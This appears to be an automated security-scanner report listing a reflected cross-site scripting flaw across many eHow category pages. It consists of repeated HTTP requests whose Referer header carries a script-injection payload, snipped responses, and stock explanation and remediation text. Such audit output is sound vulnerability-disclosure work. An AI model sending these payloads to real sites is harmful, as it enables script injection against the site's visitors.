GET /blog/ HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=da28b</script><script>alert(1)</script>c0d891d3e78
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:15:30 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 78995
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title> Official eHow Blog - How To Do Just About Every ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cc313</script><script>alert(1)</script>8cd44ec7a9c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /business/ HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=cc313</script><script>alert(1)</script>8cd44ec7a9c
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:12:36 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 75446
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Business - How To Information | eHow.com</title> ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ba477</script><script>alert(1)</script>69ee7d46388 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /car-repair-and-maintenance/ HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=ba477</script><script>alert(1)</script>69ee7d46388
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:12:35 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 72871
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Car Repair & Maintenance - How To Information | e ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 64203</script><script>alert(1)</script>24a7a2730b1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /careers/ HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=64203</script><script>alert(1)</script>24a7a2730b1
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:12:37 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 75713
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Careers - How To Information | eHow.com</title>
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5e0af</script><script>alert(1)</script>80dc93282ee was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cars/ HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=5e0af</script><script>alert(1)</script>80dc93282ee
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:12:36 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 70774
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Cars - How To Information | eHow.com</title> < ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ede99</script><script>alert(1)</script>0bc15203d14 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /community.html HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=ede99</script><script>alert(1)</script>0bc15203d14
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:15:30 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 31319
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36b44</script><script>alert(1)</script>88e1c6f7fbf was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /computer-software/ HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=36b44</script><script>alert(1)</script>88e1c6f7fbf
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:12:35 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 73075
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Computer Software - How To Information | eHow.com ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 612c9</script><script>alert(1)</script>c3e385f1396 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /computers/ HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=612c9</script><script>alert(1)</script>c3e385f1396
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:12:36 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 75195
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Computers - How To Information | eHow.com</title> ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e6b00</script><script>alert(1)</script>a19869a9edb was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /culture-and-society/ HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=e6b00</script><script>alert(1)</script>a19869a9edb
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:12:36 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 72106
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Culture & Society - How To Information | eHow.com ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ccc5a</script><script>alert(1)</script>37e4ac73692 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /diseases-and-conditions/ HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=ccc5a</script><script>alert(1)</script>37e4ac73692
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:12:47 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 71359
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Diseases & Conditions - How To Information | eHow ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f49e</script><script>alert(1)</script>3e4e9a8c938 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /drugs-and-supplements/ HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=7f49e</script><script>alert(1)</script>3e4e9a8c938
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:13:03 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 72768
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Drugs & Supplements - How To Information | eHow.c ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4db7f</script><script>alert(1)</script>d6aab24c643 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /education/ HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=4db7f</script><script>alert(1)</script>d6aab24c643
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:13:14 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 75196
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Education - How To Information | eHow.com</title> ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ca2a5</script><script>alert(1)</script>f5705aabf2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ehow-family/ HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=ca2a5</script><script>alert(1)</script>f5705aabf2
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:12:17 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 45090
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7388</script><script>alert(1)</script>20d2e506214 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ehow-food/ HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=b7388</script><script>alert(1)</script>20d2e506214
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:12:18 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 46152
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ea496</script><script>alert(1)</script>4ae4d3fc73d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ehow-health/ HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=ea496</script><script>alert(1)</script>4ae4d3fc73d
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:12:16 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 43325
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4e7b4</script><script>alert(1)</script>d1b2f931b9c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ehow-home/ HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=4e7b4</script><script>alert(1)</script>d1b2f931b9c
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:12:16 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 45118
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9e797</script><script>alert(1)</script>6668a22c52 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ehow-mobile.aspx HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=9e797</script><script>alert(1)</script>6668a22c52
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:17:01 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 24864
